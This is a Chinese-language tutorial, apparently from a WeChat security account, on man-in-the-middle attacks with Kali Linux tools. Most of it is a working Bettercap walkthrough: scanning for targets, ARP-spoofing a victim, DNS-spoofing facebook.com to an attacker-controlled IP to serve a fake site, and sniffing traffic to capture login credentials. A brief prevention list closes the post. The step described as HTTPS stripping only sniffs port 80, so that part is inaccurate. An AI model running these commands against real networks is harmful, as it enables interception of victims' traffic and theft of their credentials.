MITM(中间人)攻击允许攻击者在不知情的情况下拦截和操纵双方之间的通信。Kali Linux 提供了几种强大的工具来执行 MITM 攻击。在本文中,我们将详细探讨 MITM 攻击的工作原理、使用哪些工具以及如何防范它们。🚀
📌 什么是 MITM 攻击?
在 MITM 攻击中,攻击者在不中断通信的情况下拦截双方之间的流量,以读取、修改或注入恶意数据。这种情况通常是由于网络连接不安全或安全配置薄弱而发生的。
📍示例场景:1️⃣ 用户连接到 Wi-Fi 网络。2️⃣攻击者也连接到同一网络,拦截并重定向流量。3️⃣攻击者可能会窃取登录凭据、会话 cookie 或信用卡详细信息。
🛠️ Kali Linux 中用于 MITM 攻击的工具
Kali Linux 包含几个用于进行 MITM 攻击的工具:
🔹 Ettercap — 检测网络上的设备并重定向流量。
🔹 Bettercap — 现代 MITM 攻击的强大工具。
🔹Wireshark —捕获和分析网络流量。
🔹 dsniff —提取登录凭据和密码。
🔹 sslstrip —将 HTTPS 流量转换为 HTTP,公开加密连接。
⚡ 如何进行 MITM 攻击?(以 Bettercap 为例)
1️⃣ 安装并运行 Bettercap
Bettercap 已预装在 Kali Linux 中。如果未安装,请使用以下命令:
sudo apt update&& sudo apt install bettercap
要启动 Bettercap,请运行:
sudo bettercap -iface wlan0 # 用你的网络接口替换 wlan0
💡注意:要找到您的网络接口,请使用ifconfig
或ip a
命令。
2️⃣ 扫描网络上的设备
要发现网络上的活动设备,请运行:
net.probe on
此命令有助于识别潜在目标。
3️⃣ ARP 欺骗重定向流量
要执行 MITM 攻击,我们需要执行ARP 欺骗。使用以下命令:
set arp.spoof.targets <目标 IP> arp.spoof on
📌示例:如果目标设备的 IP 地址是192.168.1.10,则使用:
set arp.spoof.targets 192.168 .1 .10 arp.spoof on
这会迫使受害者的网络流量通过我们的系统。
4️⃣ DNS 欺骗将用户重定向到虚假网站
要将受害者重定向到虚假网站,请使用DNS 欺骗:
set dns.spoof.all true set dns.spoof.domains facebook.com 192.168.1.100 #用攻击者的IP 替换dns.spoof on
这会迫使受害者访问192.168.1.100而不是真正的facebook.com。
5️⃣剥离 HTTPS 流量以捕获凭据(sslstrip)
要降级加密连接(HTTPS 到 HTTP)并捕获凭据:
set net.sniff.filter tcp port 80 net.sniff on
这使得我们可以以纯文本形式查看登录详细信息。
🔎 如何预防 MITM 攻击?
为了防止 MITM 攻击,请遵循以下安全措施:
✅在公共 Wi-Fi 网络上使用 VPN! (这些是最常见的 MITM 攻击位置。)✅使用安全的 DNS 提供商(例如 Cloudflare、Google DNS)。✅避免在非 HTTPS 站点上输入凭据!
✅小心证书警告!(MITM 攻击可能使用假证书。)
✅使用 IDS/IPS(例如 Snort、Suricata)检测 ARP 欺骗。
原文始发于微信公众号(KK安全说):Kali & MITM
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论